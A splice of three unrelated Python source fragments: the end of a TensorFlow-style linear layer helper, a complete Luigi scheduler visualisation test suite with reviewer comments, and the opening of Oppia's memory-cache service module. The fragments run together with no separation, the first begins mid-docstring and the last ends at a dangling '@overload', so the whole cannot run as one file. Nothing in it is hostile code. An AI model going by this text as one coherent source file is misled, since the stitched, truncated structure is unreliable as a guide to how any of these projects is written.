    ValueError: if some of the arguments has unspecified or wrong shape.
  """
  if args is None or (nest.is_sequence(args) and not args):
    raise ValueError("`args` must be specified")
  if not nest.is_sequence(args):
    args = [args]

  # Calculate the total size of arguments on dimension 1.
  total_arg_size = 0
  shapes = [a.get_shape() for a in args]
  for shape in shapes:
    if shape.ndims != 2:
      raise ValueError("linear is expecting 2D arguments: %s" % shapes)
    if shape[1].value is None:
      # FIX: shape[1] is a Dimension whose value is None on this path; the
      # original "%d" raised a TypeError while formatting the error message.
      raise ValueError("linear expects shape[1] to be provided for shape %s, "
                       "but saw %s" % (shape, shape[1]))
    else:
      total_arg_size += shape[1].value

  dtype = [a.dtype for a in args][0]

  # Now the computation.
  # NOTE(review): the `scope` parameter is overwritten here (variables are
  # always created in the *current* variable scope) — confirm this is the
  # intended deprecation of the argument.
  scope = vs.get_variable_scope()
  with vs.variable_scope(scope) as outer_scope:
    weights = vs.get_variable(
        "weights", [total_arg_size, output_size], dtype=dtype)
    if len(args) == 1:
      res = math_ops.matmul(args[0], weights)
    else:
      res = math_ops.matmul(array_ops.concat(1, args), weights)
    if not bias:
      return res
    with vs.variable_scope(outer_scope) as inner_scope:
      # Biases are never partitioned, even if the outer scope is.
      inner_scope.set_partitioner(None)
      biases = vs.get_variable(
          "biases", [output_size], dtype=dtype,
          initializer=init_ops.constant_initializer(bias_start, dtype=dtype))
    return nn_ops.bias_add(res, biases)
# -*- coding: utf-8 -*-
#
# Copyright 2012-2015 Spotify AB
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#

"""Tests for the scheduler's visualisation-facing APIs: ``graph``,
``dep_graph``/``inverse_dep_graph``, ``task_list``, ``task_search``,
``fetch_error`` and ``worker_list``.
"""

from __future__ import division

import os
import tempfile
import time

from helpers import unittest

import luigi
import luigi.notifications
import luigi.scheduler
import luigi.six as six
import luigi.worker

luigi.notifications.DEBUG = True
# Shared scratch directory for task output files; created once per test run.
tempdir = tempfile.mkdtemp()


class DummyTask(luigi.Task):
    """Trivial task that completes by touching an empty output file."""

    task_id = luigi.Parameter()

    def run(self):
        f = self.output().open('w')
        f.close()

    def output(self):
        # str(self) includes the parameter, so each DummyTask gets its own file.
        return luigi.LocalTarget(os.path.join(tempdir, str(self)))


class FactorTask(luigi.Task):
    """Task whose requirements are the first factor pair of ``product``,
    recursively — producing tree/diamond-shaped dependency graphs."""

    product = luigi.Parameter()

    def requires(self):
        for factor in range(2, self.product):
            if self.product % factor == 0:
                yield FactorTask(factor)
                yield FactorTask(self.product // factor)
                # Only the first factor pair is yielded; deeper factorisation
                # happens through the recursive requirements.
                return

    def run(self):
        f = self.output().open('w')
        f.close()

    def output(self):
        return luigi.LocalTarget(os.path.join(tempdir, 'luigi_test_factor_%d' % self.product))


class BadReqTask(luigi.Task):
    """Task whose ``requires`` raises (via assert) when ``succeed`` is False,
    used to exercise graphs with unfulfillable/unknown dependencies."""

    succeed = luigi.BoolParameter()

    def requires(self):
        assert self.succeed
        yield BadReqTask(False)

    def run(self):
        pass

    def complete(self):
        return False


class FailingTask(luigi.Task):
    """Task that always fails at run time with a known error message."""

    task_namespace = __name__
    task_id = luigi.Parameter()

    def run(self):
        raise Exception("Error Message")


class OddFibTask(luigi.Task):
    """Fibonacci-shaped dependency graph where even-n nodes report complete
    (when ``done`` is set), used for include_done filtering tests."""

    n = luigi.IntParameter()
    # Insignificant so that done=True / done=False variants share task ids.
    done = luigi.BoolParameter(default=True, significant=False)

    def requires(self):
        if self.n > 1:
            yield OddFibTask(self.n - 1, self.done)
            yield OddFibTask(self.n - 2, self.done)

    def complete(self):
        return self.n % 2 == 0 and self.done

    def run(self):
        # Odd-n tasks are never expected to actually run in these tests.
        assert False


class SchedulerVisualisationTest(unittest.TestCase):

    def setUp(self):
        self.scheduler = luigi.scheduler.Scheduler()

    def tearDown(self):
        pass

    def _assert_complete(self, tasks):
        """Assert every task in the iterable reports complete()."""
        for t in tasks:
            self.assert_(t.complete())

    def _build(self, tasks):
        """Add the given tasks to a fresh single-process worker and run it."""
        with luigi.worker.Worker(scheduler=self.scheduler, worker_processes=1) as w:
            for t in tasks:
                w.add(t)
            w.run()

    def _remote(self):
        # The "remote" scheduler is the in-process one in these tests.
        return self.scheduler

    def _test_run(self, workers):
        # NOTE(review): _build() takes no ``workers`` kwarg — this helper looks
        # stale/broken and appears to be unused by the tests below; confirm.
        tasks = [DummyTask(i) for i in range(20)]
        self._build(tasks, workers=workers)
        self._assert_complete(tasks)

    def test_graph(self):
        """graph() lists every task with status, deps and a start_time
        bracketed by the build's wall-clock window."""
        start = time.time()
        tasks = [DummyTask(task_id=1), DummyTask(task_id=2)]
        self._build(tasks)
        self._assert_complete(tasks)
        end = time.time()

        remote = self._remote()
        graph = remote.graph()
        self.assertEqual(len(graph), 2)

        self.assert_(DummyTask(task_id=1).task_id in graph)
        d1 = graph[DummyTask(task_id=1).task_id]
        self.assertEqual(d1[u'status'], u'DONE')
        self.assertEqual(d1[u'deps'], [])
        self.assertGreaterEqual(d1[u'start_time'], start)
        self.assertLessEqual(d1[u'start_time'], end)

        d2 = graph[DummyTask(task_id=2).task_id]
        self.assertEqual(d2[u'status'], u'DONE')
        self.assertEqual(d2[u'deps'], [])
        self.assertGreaterEqual(d2[u'start_time'], start)
        self.assertLessEqual(d2[u'start_time'], end)

    def test_large_graph_truncate(self):
        """dep_graph truncates a 101-node chain to max_graph_nodes, keeping
        the nodes nearest the queried root."""
        class LinearTask(luigi.Task):
            idx = luigi.IntParameter()

            def requires(self):
                if self.idx > 0:
                    yield LinearTask(self.idx - 1)

            def complete(self):
                return False

        root_task = LinearTask(100)
        self.scheduler = luigi.scheduler.Scheduler(max_graph_nodes=10)
        self._build([root_task])

        graph = self.scheduler.dep_graph(root_task.task_id)
        self.assertEqual(10, len(graph))
        expected_nodes = [LinearTask(i).task_id for i in range(100, 90, -1)]
        six.assertCountEqual(self, expected_nodes, graph)

    def test_large_inverse_graph_truncate(self):
        """inverse_dep_graph truncates symmetrically, keeping the nodes
        nearest the queried leaf."""
        class LinearTask(luigi.Task):
            idx = luigi.IntParameter()

            def requires(self):
                if self.idx > 0:
                    yield LinearTask(self.idx - 1)

            def complete(self):
                return False

        root_task = LinearTask(100)
        self.scheduler = luigi.scheduler.Scheduler(max_graph_nodes=10)
        self._build([root_task])

        graph = self.scheduler.inverse_dep_graph(LinearTask(0).task_id)
        self.assertEqual(10, len(graph))
        expected_nodes = [LinearTask(i).task_id for i in range(10)]
        six.assertCountEqual(self, expected_nodes, graph)

    def test_truncate_graph_with_full_levels(self):
        """Truncation of a binary tree keeps whole breadth-first levels."""
        class BinaryTreeTask(luigi.Task):
            idx = luigi.IntParameter()

            def requires(self):
                if self.idx < 100:
                    return map(BinaryTreeTask, (self.idx * 2, self.idx * 2 + 1))

        root_task = BinaryTreeTask(1)
        self.scheduler = luigi.scheduler.Scheduler(max_graph_nodes=10)
        self._build([root_task])

        graph = self.scheduler.dep_graph(root_task.task_id)
        self.assertEqual(10, len(graph))
        expected_nodes = [BinaryTreeTask(i).task_id for i in range(1, 11)]
        six.assertCountEqual(self, expected_nodes, graph)

    def test_truncate_graph_with_multiple_depths(self):
        """A node (LinearTask(0)) reachable at several depths is retained
        exactly once in the truncated graph."""
        class LinearTask(luigi.Task):
            idx = luigi.IntParameter()

            def requires(self):
                if self.idx > 0:
                    yield LinearTask(self.idx - 1)
                yield LinearTask(0)

            def complete(self):
                return False

        root_task = LinearTask(100)
        self.scheduler = luigi.scheduler.Scheduler(max_graph_nodes=10)
        self._build([root_task])

        graph = self.scheduler.dep_graph(root_task.task_id)
        self.assertEqual(10, len(graph))
        expected_nodes = [LinearTask(i).task_id for i in range(100, 91, -1)] +\
            [LinearTask(0).task_id]
        self.maxDiff = None
        six.assertCountEqual(self, expected_nodes, graph)

    def _assert_all_done(self, tasks):
        self._assert_all(tasks, u'DONE')

    def _assert_all(self, tasks, status):
        """Assert every node dict in ``tasks`` (a graph mapping) has ``status``."""
        for task in tasks.values():
            self.assertEqual(task[u'status'], status)

    def test_dep_graph_single(self):
        self._build([FactorTask(1)])
        remote = self._remote()
        dep_graph = remote.dep_graph(FactorTask(product=1).task_id)
        self.assertEqual(len(dep_graph), 1)
        self._assert_all_done(dep_graph)

        d1 = dep_graph.get(FactorTask(product=1).task_id)
        self.assertEqual(type(d1), type({}))
        self.assertEqual(d1[u'deps'], [])

    def test_dep_graph_not_found(self):
        # Querying a task id the scheduler never saw yields an empty graph.
        self._build([FactorTask(1)])
        remote = self._remote()
        dep_graph = remote.dep_graph(FactorTask(product=5).task_id)
        self.assertEqual(len(dep_graph), 0)

    def test_inverse_dep_graph_not_found(self):
        self._build([FactorTask(1)])
        remote = self._remote()
        dep_graph = remote.inverse_dep_graph('FactorTask(product=5)')
        self.assertEqual(len(dep_graph), 0)

    def test_dep_graph_tree(self):
        # 30 factors into 2 * 15 = 2 * (3 * 5): five nodes in a tree.
        self._build([FactorTask(30)])
        remote = self._remote()
        dep_graph = remote.dep_graph(FactorTask(product=30).task_id)
        self.assertEqual(len(dep_graph), 5)
        self._assert_all_done(dep_graph)

        d30 = dep_graph[FactorTask(product=30).task_id]
        self.assertEqual(sorted(d30[u'deps']),
                         sorted([FactorTask(product=15).task_id, FactorTask(product=2).task_id]))

        d2 = dep_graph[FactorTask(product=2).task_id]
        self.assertEqual(sorted(d2[u'deps']), [])

        d15 = dep_graph[FactorTask(product=15).task_id]
        self.assertEqual(sorted(d15[u'deps']),
                         sorted([FactorTask(product=3).task_id, FactorTask(product=5).task_id]))

        d3 = dep_graph[FactorTask(product=3).task_id]
        self.assertEqual(sorted(d3[u'deps']), [])

        d5 = dep_graph[FactorTask(product=5).task_id]
        self.assertEqual(sorted(d5[u'deps']), [])

    def test_dep_graph_missing_deps(self):
        """A dependency whose requires() blew up still shows in the graph,
        with status UNKNOWN and its parsed name/params."""
        self._build([BadReqTask(True)])
        dep_graph = self._remote().dep_graph(BadReqTask(succeed=True).task_id)
        self.assertEqual(len(dep_graph), 2)

        suc = dep_graph[BadReqTask(succeed=True).task_id]
        self.assertEqual(suc[u'deps'], [BadReqTask(succeed=False).task_id])

        fail = dep_graph[BadReqTask(succeed=False).task_id]
        self.assertEqual(fail[u'name'], 'BadReqTask')
        self.assertEqual(fail[u'params'], {'succeed': 'False'})
        self.assertEqual(fail[u'status'], 'UNKNOWN')

    def test_dep_graph_diamond(self):
        # 12 = 2 * 6 = 2 * (2 * 3): the "2" node is shared (diamond shape).
        self._build([FactorTask(12)])
        remote = self._remote()
        dep_graph = remote.dep_graph(FactorTask(product=12).task_id)
        self.assertEqual(len(dep_graph), 4)
        self._assert_all_done(dep_graph)

        d12 = dep_graph[FactorTask(product=12).task_id]
        self.assertEqual(sorted(d12[u'deps']),
                         sorted([FactorTask(product=2).task_id, FactorTask(product=6).task_id]))

        d6 = dep_graph[FactorTask(product=6).task_id]
        self.assertEqual(sorted(d6[u'deps']),
                         sorted([FactorTask(product=2).task_id, FactorTask(product=3).task_id]))

        d3 = dep_graph[FactorTask(product=3).task_id]
        self.assertEqual(sorted(d3[u'deps']), [])

        d2 = dep_graph[FactorTask(product=2).task_id]
        self.assertEqual(sorted(d2[u'deps']), [])

    def test_dep_graph_skip_done(self):
        """include_done=False drops DONE nodes and prunes edges into them."""
        task = OddFibTask(9)
        self._build([task])
        remote = self._remote()

        task_id = task.task_id
        self.assertEqual(9, len(remote.dep_graph(task_id, include_done=True)))

        skip_done_graph = remote.dep_graph(task_id, include_done=False)
        self.assertEqual(5, len(skip_done_graph))
        for task in skip_done_graph.values():
            self.assertNotEqual('DONE', task['status'])
            self.assertLess(len(task['deps']), 2)

    def test_inverse_dep_graph_skip_done(self):
        self._build([OddFibTask(9, done=False)])
        self._build([OddFibTask(9, done=True)])
        remote = self._remote()

        task_id = OddFibTask(1).task_id
        self.assertEqual(9, len(remote.inverse_dep_graph(task_id, include_done=True)))

        skip_done_graph = remote.inverse_dep_graph(task_id, include_done=False)
        self.assertEqual(5, len(skip_done_graph))
        for task in skip_done_graph.values():
            self.assertNotEqual('DONE', task['status'])
            self.assertLess(len(task['deps']), 2)

    def test_task_list_single(self):
        self._build([FactorTask(7)])
        remote = self._remote()
        tasks_done = remote.task_list('DONE', '')
        self.assertEqual(len(tasks_done), 1)
        self._assert_all_done(tasks_done)

        t7 = tasks_done.get(FactorTask(product=7).task_id)
        self.assertEqual(type(t7), type({}))

        # Empty status filter returns everything; other statuses are empty.
        self.assertEqual(remote.task_list('', ''), tasks_done)
        self.assertEqual(remote.task_list('FAILED', ''), {})
        self.assertEqual(remote.task_list('PENDING', ''), {})

    def test_dep_graph_root_has_display_name(self):
        root_task = FactorTask(12)
        self._build([root_task])

        dep_graph = self._remote().dep_graph(root_task.task_id)
        self.assertEqual('FactorTask(product=12)',
                         dep_graph[root_task.task_id]['display_name'])

    def test_dep_graph_non_root_nodes_lack_display_name(self):
        root_task = FactorTask(12)
        self._build([root_task])

        dep_graph = self._remote().dep_graph(root_task.task_id)
        for task_id, node in dep_graph.items():
            if task_id != root_task.task_id:
                self.assertNotIn('display_name', node)

    def test_task_list_failed(self):
        self._build([FailingTask(8)])
        remote = self._remote()
        failed = remote.task_list('FAILED', '')
        self.assertEqual(len(failed), 1)

        f8 = failed.get(FailingTask(task_id=8).task_id)
        self.assertEqual(f8[u'status'], u'FAILED')

        self.assertEqual(remote.task_list('DONE', ''), {})
        self.assertEqual(remote.task_list('PENDING', ''), {})

    def test_task_list_upstream_status(self):
        """Upstream-status filter distinguishes tasks pending because of
        missing external input vs a failed upstream task."""
        class A(luigi.ExternalTask):
            pass

        class B(luigi.ExternalTask):
            def complete(self):
                return True

        class C(luigi.Task):
            def requires(self):
                return [A(), B()]

        class F(luigi.Task):
            def run(self):
                raise Exception()

        class D(luigi.Task):
            def requires(self):
                return [F()]

        class E(luigi.Task):
            def requires(self):
                return [C(), D()]

        self._build([E()])
        remote = self._remote()

        done = remote.task_list('DONE', '')
        self.assertEqual(len(done), 1)
        db = done.get(B().task_id)
        self.assertEqual(db['status'], 'DONE')

        missing_input = remote.task_list('PENDING', 'UPSTREAM_MISSING_INPUT')
        self.assertEqual(len(missing_input), 2)

        pa = missing_input.get(A().task_id)
        self.assertEqual(pa['status'], 'PENDING')
        self.assertEqual(remote._upstream_status(A().task_id, {}), 'UPSTREAM_MISSING_INPUT')

        pc = missing_input.get(C().task_id)
        self.assertEqual(pc['status'], 'PENDING')
        self.assertEqual(remote._upstream_status(C().task_id, {}), 'UPSTREAM_MISSING_INPUT')

        upstream_failed = remote.task_list('PENDING', 'UPSTREAM_FAILED')
        self.assertEqual(len(upstream_failed), 2)
        pe = upstream_failed.get(E().task_id)
        self.assertEqual(pe['status'], 'PENDING')
        self.assertEqual(remote._upstream_status(E().task_id, {}), 'UPSTREAM_FAILED')

        pe = upstream_failed.get(D().task_id)
        self.assertEqual(pe['status'], 'PENDING')
        self.assertEqual(remote._upstream_status(D().task_id, {}), 'UPSTREAM_FAILED')

        pending = dict(missing_input)
        pending.update(upstream_failed)
        self.assertEqual(remote.task_list('PENDING', ''), pending)
        self.assertEqual(remote.task_list('PENDING', 'UPSTREAM_RUNNING'), {})

        failed = remote.task_list('FAILED', '')
        self.assertEqual(len(failed), 1)
        fd = failed.get(F().task_id)
        self.assertEqual(fd['status'], 'FAILED')

        all = dict(pending)
        all.update(done)
        all.update(failed)
        self.assertEqual(remote.task_list('', ''), all)
        self.assertEqual(remote.task_list('RUNNING', ''), {})

    def test_task_search(self):
        """task_search groups matching tasks by their status."""
        self._build([FactorTask(8)])
        self._build([FailingTask(8)])
        remote = self._remote()
        all_tasks = remote.task_search('Task')
        self.assertEqual(len(all_tasks), 2)
        self._assert_all(all_tasks['DONE'], 'DONE')
        self._assert_all(all_tasks['FAILED'], 'FAILED')

    def test_fetch_error(self):
        self._build([FailingTask(8)])
        remote = self._remote()
        error = remote.fetch_error(FailingTask(task_id=8).task_id)
        self.assertEqual(error["taskId"], FailingTask(task_id=8).task_id)
        self.assertTrue("Error Message" in error["error"])
        self.assertTrue("Runtime error" in error["error"])
        self.assertTrue("Traceback" in error["error"])

    def test_inverse_deps(self):
        """inverse_dep_graph follows dependents: X <- Y <- Z(1),Z(2) <- ZZ."""
        class X(luigi.Task):
            pass

        class Y(luigi.Task):
            def requires(self):
                return [X()]

        class Z(luigi.Task):
            id = luigi.Parameter()

            def requires(self):
                return [Y()]

        class ZZ(luigi.Task):
            def requires(self):
                return [Z(1), Z(2)]

        self._build([ZZ()])
        dep_graph = self._remote().inverse_dep_graph(X().task_id)

        def assert_has_deps(task_id, deps):
            self.assertTrue(task_id in dep_graph, '%s not in dep_graph %s' % (task_id, dep_graph))
            task = dep_graph[task_id]
            self.assertEqual(sorted(task['deps']), sorted(deps),
                             '%s does not have deps %s' % (task_id, deps))

        assert_has_deps(X().task_id, [Y().task_id])
        assert_has_deps(Y().task_id, [Z(id=1).task_id, Z(id=2).task_id])
        assert_has_deps(Z(id=1).task_id, [ZZ().task_id])
        assert_has_deps(Z(id=2).task_id, [ZZ().task_id])
        assert_has_deps(ZZ().task_id, [])

    def test_simple_worker_list(self):
        class X(luigi.Task):
            def run(self):
                self._complete = True

            def complete(self):
                return getattr(self, '_complete', False)

        task_x = X()
        self._build([task_x])

        workers = self._remote().worker_list()
        self.assertEqual(1, len(workers))
        worker = workers[0]
        self.assertEqual(task_x.task_id, worker['first_task'])
        self.assertEqual(0, worker['num_pending'])
        self.assertEqual(0, worker['num_uniques'])
        self.assertEqual(0, worker['num_running'])
        self.assertEqual('active', worker['state'])
        self.assertEqual(1, worker['workers'])

    def test_worker_list_pending_uniques(self):
        """Two workers sharing dependency X: each has 2 pending tasks, of
        which exactly 1 is unique to that worker."""
        class X(luigi.Task):
            def complete(self):
                return False

        class Y(X):
            def requires(self):
                return X()

        class Z(Y):
            pass

        w1 = luigi.worker.Worker(scheduler=self.scheduler, worker_processes=1)
        w2 = luigi.worker.Worker(scheduler=self.scheduler, worker_processes=1)
        w1.add(Y())
        w2.add(Z())

        workers = self._remote().worker_list()
        self.assertEqual(2, len(workers))
        for worker in workers:
            self.assertEqual(2, worker['num_pending'])
            self.assertEqual(1, worker['num_uniques'])
            self.assertEqual(0, worker['num_running'])

    def test_worker_list_running(self):
        class X(luigi.Task):
            n = luigi.IntParameter()

        w = luigi.worker.Worker(worker_id='w', scheduler=self.scheduler, worker_processes=3)
        w.add(X(0))
        w.add(X(1))
        w.add(X(2))
        w.add(X(3))

        # Pull three work items without completing them: they count as running.
        self.scheduler.get_work(worker='w')
        self.scheduler.get_work(worker='w')
        self.scheduler.get_work(worker='w')

        workers = self._remote().worker_list()
        self.assertEqual(1, len(workers))
        worker = workers[0]
        self.assertEqual(3, worker['num_running'])
        self.assertEqual(1, worker['num_pending'])
        self.assertEqual(1, worker['num_uniques'])

    def test_worker_list_disabled_worker(self):
        class X(luigi.Task):
            pass

        with luigi.worker.Worker(worker_id='w', scheduler=self.scheduler) as w:
            w.add(X())
            #
            workers = self._remote().worker_list()
            self.assertEqual(1, len(workers))
            self.assertEqual('active', workers[0]['state'])
            self.scheduler.disable_worker('w')
            workers = self._remote().worker_list()
            self.assertEqual(1, len(workers))
            # NOTE(review): the following assertion is a duplicate of the one
            # above (kept byte-identical); likely a copy/paste artifact.
            self.assertEqual(1, len(workers))
            self.assertEqual('disabled', workers[0]['state'])
# coding: utf-8
#
# Copyright 2020 The Oppia Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS-IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.

"""Service functions to set and retrieve data from the memory cache."""

from __future__ import annotations

import json

from core.domain import caching_domain
from core.domain import collection_domain
from core.domain import exp_domain
from core.domain import platform_parameter_domain
from core.domain import skill_domain
from core.domain import story_domain
from core.domain import topic_domain
from core.platform import models

from typing import Any, Callable, Dict, List, cast, overload
from typing_extensions import Final, Literal, TypedDict

MYPY = False
if MYPY:  # pragma: no cover
    from mypy_imports import memory_cache_services

memory_cache_services = models.Registry.import_cache_services()

# NOTE: Namespaces and sub-namespaces cannot contain ':' because this is used as
# an internal delimiter for cache keys that separates the namespace, the
# sub-namespace, and the id in the cache keys.
MEMCACHE_KEY_DELIMITER = ':'

# This namespace supports sub-namespaces which are identified by the stringified
# version number of the explorations within the sub-namespace. The value for
# each key in this namespace should be a serialized representation of an
# Exploration. There is also a special sub-namespace represented by the empty
# string; this sub-namespace stores the latest version of the exploration.
CACHE_NAMESPACE_EXPLORATION: Final = 'exploration'

# This namespace supports sub-namespaces which are identified by the stringified
# version number of the collections within the sub-namespace. The value for
# each key in this namespace should be a serialized representation of a
# Collection. There is also a special sub-namespace represented by the empty
# string; this sub-namespace stores the latest version of the collection.
CACHE_NAMESPACE_COLLECTION: Final = 'collection'

# This namespace supports sub-namespaces which are identified by the stringified
# version number of the skills within the sub-namespace. The value for
# each key in this namespace should be a serialized representation of a
# Skill. There is also a special sub-namespace represented by the empty
# string; this sub-namespace stores the latest version of the skill.
CACHE_NAMESPACE_SKILL: Final = 'skill'

# This namespace supports sub-namespaces which are identified by the stringified
# version number of the stories within the sub-namespace. The value for
# each key in this namespace should be a serialized representation of a
# Story. There is also a special sub-namespace represented by the empty
# string; this sub-namespace stores the latest version of the story.
CACHE_NAMESPACE_STORY: Final = 'story'

# This namespace supports sub-namespaces which are identified by the stringified
# version number of the topics within the sub-namespace. The value for
# each key in this namespace should be a serialized representation of a
# Topic. There is also a special sub-namespace represented by the empty
# string; this sub-namespace stores the latest version of the topic.
CACHE_NAMESPACE_TOPIC: Final = 'topic'

# The value for each key in this namespace should be a serialized
# representation of a Platform Parameter. This namespace does not support
# sub-namespaces.
CACHE_NAMESPACE_PLATFORM_PARAMETER: Final = 'platform'

# The value for each key in this namespace should be a serialized representation
# of a ConfigPropertyModel value (the 'value' attribute of a ConfigPropertyModel
# object). This namespace does not support sub-namespaces.
CACHE_NAMESPACE_CONFIG: Final = 'config'

# The sub-namespace is not necessary for the default namespace. The namespace
# handles default datatypes allowed by Redis including Strings, Lists, Sets,
# and Hashes. More details can be found at: https://redis.io/topics/data-types.
CACHE_NAMESPACE_DEFAULT: Final = 'default'


class DeserializationFunctionsDict(TypedDict):
    """Type for the DESERIALIZATION_FUNCTIONS."""

    collection: Callable[[str], collection_domain.Collection]
    exploration: Callable[[str], exp_domain.Exploration]
    skill: Callable[[str], skill_domain.Skill]
    story: Callable[[str], story_domain.Story]
    topic: Callable[[str], topic_domain.Topic]
    platform: Callable[[str], platform_parameter_domain.PlatformParameter]
    config: Callable[[str], dict[str, Any]]
    default: Callable[[str], dict[str, Any]]


class SerializationFunctionsDict(TypedDict):
    """Type for the SERIALIZATION_FUNCTIONS."""

    collection: Callable[[collection_domain.Collection], str]
    exploration: Callable[[exp_domain.Exploration], str]
    skill: Callable[[skill_domain.Skill], str]
    story: Callable[[story_domain.Story], str]
    topic: Callable[[topic_domain.Topic], str]
    platform: Callable[[platform_parameter_domain.PlatformParameter], str]
    config: Callable[[dict[str, Any]], str]
    default: Callable[[dict[str, Any]], str]


# Type defined for arguments which can accept only keys of Dict
# DESERIALIZATION_FUNCTIONS or SERIALIZATION_FUNCTIONS.
NamespaceType = Literal[
    'collection',
    'exploration',
    'skill',
    'story',
    'topic',
    'platform',
    'config',
    'default'
]

# Maps each namespace to the function that decodes a cached string back into
# the corresponding domain object (or plain JSON for config/default).
DESERIALIZATION_FUNCTIONS: DeserializationFunctionsDict = {
    CACHE_NAMESPACE_COLLECTION: collection_domain.Collection.deserialize,
    CACHE_NAMESPACE_EXPLORATION: exp_domain.Exploration.deserialize,
    CACHE_NAMESPACE_SKILL: skill_domain.Skill.deserialize,
    CACHE_NAMESPACE_STORY: story_domain.Story.deserialize,
    CACHE_NAMESPACE_TOPIC: topic_domain.Topic.deserialize,
    CACHE_NAMESPACE_PLATFORM_PARAMETER: (
        platform_parameter_domain.PlatformParameter.deserialize),
    CACHE_NAMESPACE_CONFIG: json.loads,
    CACHE_NAMESPACE_DEFAULT: json.loads
}

# Since we mapped this Dict with `SerializationFunctionsDict`, every 'x' in
# each value belongs to some domain object (e.g. CACHE_NAMESPACE_COLLECTION's
# x is a Collection object). When we call the serialize method on it, MyPy
# expects the call to be typed, so the ignore comments are placed temporarily
# to suppress the untyped-call errors until all classes are typed.
SERIALIZATION_FUNCTIONS: SerializationFunctionsDict = {
    CACHE_NAMESPACE_COLLECTION: lambda x: cast(str, x.serialize()),  # type: ignore[no-untyped-call]
    CACHE_NAMESPACE_EXPLORATION: lambda x: cast(str, x.serialize()),  # type: ignore[no-untyped-call]
    CACHE_NAMESPACE_SKILL: lambda x: cast(str, x.serialize()),  # type: ignore[no-untyped-call]
    CACHE_NAMESPACE_STORY: lambda x: cast(str, x.serialize()),  # type: ignore[no-untyped-call]
    CACHE_NAMESPACE_TOPIC: lambda x: x.serialize(),
    CACHE_NAMESPACE_PLATFORM_PARAMETER: lambda x: cast(str, x.serialize()),  # type: ignore[no-untyped-call]
    CACHE_NAMESPACE_CONFIG: json.dumps,
    CACHE_NAMESPACE_DEFAULT: json.dumps
}


def _get_memcache_key(
    namespace: NamespaceType,
    sub_namespace: str | None,
    obj_id: str
) -> str:
    """Returns a memcache key for the class under the corresponding
    namespace and sub_namespace.

    Args:
        namespace: str. The namespace under which the values associated with
            the id lie. Use CACHE_NAMESPACE_DEFAULT as the namespace for ids
            that are not associated with a conceptual domain-layer entity and
            therefore don't require serialization.
        sub_namespace: str|None. The sub-namespace further differentiates the
            values. For Explorations, Skills, Stories, Topics, and Collections,
            the sub-namespace is the stringified version number of the objects.
        obj_id: str. The id of the value to store in the memory cache.

    Raises:
        ValueError. The sub-namespace contains a ':'.

    Returns:
        str. The generated key for use in the memory cache in order to
        differentiate a passed-in key based on namespace and sub-namespace.
    """
    sub_namespace_key_string = (sub_namespace or '')
    # A ':' inside the sub-namespace would make the key ambiguous, since ':'
    # is the delimiter between the three key components.
    if MEMCACHE_KEY_DELIMITER in sub_namespace_key_string:
        raise ValueError(
            'Sub-namespace %s cannot contain \':\'.' % sub_namespace_key_string)
    return '%s%s%s%s%s' % (
        namespace, MEMCACHE_KEY_DELIMITER,
        sub_namespace_key_string, MEMCACHE_KEY_DELIMITER,
        obj_id)


def flush_memory_caches() -> None:
    """Flushes the memory caches by wiping all of the data."""
    memory_cache_services.flush_caches()


@overload
def get_multi(
    namespace: Literal['collection'],
    sub_namespace: str | None,
    obj_ids: List[str]
) -> Dict[str, collection_domain.Collection]: ...


@overload
def get_multi(
    namespace: Literal['exploration'],
    sub_namespace: str | None,
    obj_ids: List[str]
) -> Dict[str, exp_domain.Exploration]: ...


@overload
def get_multi(
    namespace: Literal['skill'],
    sub_namespace: str | None,
    obj_ids: List[str]
) -> Dict[str, skill_domain.Skill]: ...


@overload
def get_multi(
    namespace: Literal['story'],
    sub_namespace: str | None,
    obj_ids: List[str]
) -> Dict[str, story_domain.Story]: ...


@overload
def get_multi(
    namespace: Literal['topic'],
    sub_namespace: str | None,
    obj_ids: List[str]
) -> Dict[str, topic_domain.Topic]: ...


@overload
def get_multi(
    namespace: Literal['platform'],
    sub_namespace: str | None,
    obj_ids: List[str]
) -> Dict[str, platform_parameter_domain.PlatformParameter]: ...


@overload
def get_multi(
    namespace: Literal['config'],
    sub_namespace: str | None,
    obj_ids: List[str]
) -> Dict[str, Dict[str, Any]]: ...


@overload
def get_multi(
    namespace: Literal['default'],
    sub_namespace: str | None,
    obj_ids: List[str]
) -> Dict[str, Dict[str, Any]]: ...


def get_multi(
    namespace: NamespaceType,
    sub_namespace: str | None,
    obj_ids: List[str]
) -> Dict[str, Any]:
    """Get a dictionary of the {id, value} pairs from the memory cache.

    Args:
        namespace: str. The namespace under which the values associated with
            these object ids lie. The namespace determines how the objects are
            decoded from their JSON-encoded string. Use CACHE_NAMESPACE_DEFAULT
            as the namespace for objects that are not associated with a
            conceptual domain-layer entity and therefore don't require
            serialization.
        sub_namespace: str|None. The sub-namespace further differentiates the
            values. For Explorations, Skills, Stories, Topics, and Collections,
            the sub-namespace is either None or the stringified version number
            of the objects. If the sub-namespace is not required, pass in None.
        obj_ids: list(str). List of object ids corresponding to values to
            retrieve from the cache.

    Raises:
        ValueError. The namespace does not exist or is not recognized.

    Returns:
        dict(str, Exploration|Skill|Story|Topic|Collection|str). Dictionary of
        decoded (id, value) pairs retrieved from the platform caching service.
    """
    # In result_dict's key-value pair, value can be any of the type from
    # Exploration, Skill, Story, Topic, Collection, str. Hence the Any type
    # has to be used here for the value type of the result_dict dictionary.
    result_dict: Dict[str, Any] = {}
    if len(obj_ids) == 0:
        return result_dict

    if namespace not in DESERIALIZATION_FUNCTIONS:
        raise ValueError('Invalid namespace: %s.' % namespace)

    memcache_keys = [
        _get_memcache_key(namespace, sub_namespace, obj_id)
        for obj_id in obj_ids]
    values = memory_cache_services.get_multi(memcache_keys)
    # Cache misses come back falsy and are simply omitted from the result.
    for obj_id, value in zip(obj_ids, values):
        if value:
            result_dict[obj_id] = DESERIALIZATION_FUNCTIONS[namespace](value)

    return result_dict


@overload
